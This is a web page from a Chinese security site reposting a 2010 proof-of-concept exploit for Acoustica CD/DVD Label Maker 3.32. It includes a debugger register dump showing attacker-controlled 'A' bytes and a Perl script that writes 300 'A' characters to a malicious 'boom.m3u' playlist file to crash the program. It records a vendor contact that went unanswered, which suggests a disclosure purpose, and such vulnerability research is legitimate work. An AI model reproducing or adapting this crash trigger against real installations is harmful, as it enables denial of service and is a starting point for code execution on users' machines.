首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acoustica v. 3.32 cd/dvd label maker .m3u PoC
来源:chap0x90 at gmail dot com 作者:chap0 发布时间:2010-04-28  
=============================================
Acoustica v. 3.32 cd/dvd label maker .m3u PoC
=============================================

# Exploit Title: Acoustica cd/dvd label maker .m3u PoC
# Date: April 27,2010
# Software Link: [http://www.acoustica.com/cd-label-maker/]
# Version: 3.32
# Tested on: Windows XP Sp3/Windows 7
# Author: chap0
# Email: chap0x90 at gmail dot com
#
# Contacted Vendor Apr 19, 2010
# Auto Reply Support Ticket ID:155626 Apr 19 2010
# No further communication from vendor
#
# Greetz and Thanks to mr_me
#
#
# EAX 00000041
# ECX 0000012C
# EDX 000DE9A8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. . ."
# EBX 000004EA
# ESP 000DE960
# EBP 000DEBB8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# ESI 00410041 cdlabel.00410041
# EDI 00410041 cdlabel.00410041
# EIP 00605216 cdlabel.00605216
#
#!/usr/bin/perl

$file = "boom.m3u";
$junk = "\x41" x 300;

print "Creating Nasty .m3u file\n";
open (FILE, ">$file");
print FILE "$junk";
close FILE;

print "Done\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32/xp sp3 (Fr) calc.exe she
·Boutique SudBox 1.2 Changer Lo
·Serenity Audio Player Buffer O
·Portaneo Portal v2.2.3 Remote
·linux/x86-64 sethostname() & k
·Avast! 4.7 aavmker4.sys privil
·Safari 4.0.5 (531.22.7) Denial
·Bigant Messenger <= v2.52 - (A
·Avast! 4.7 aavmker4.sys privil
·Canvas tag DoS - Multiple Brow
·IDEAL Migration 2009 v4.5.1 Lo
·Acoustica v. 3.32 cd/dvd label
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved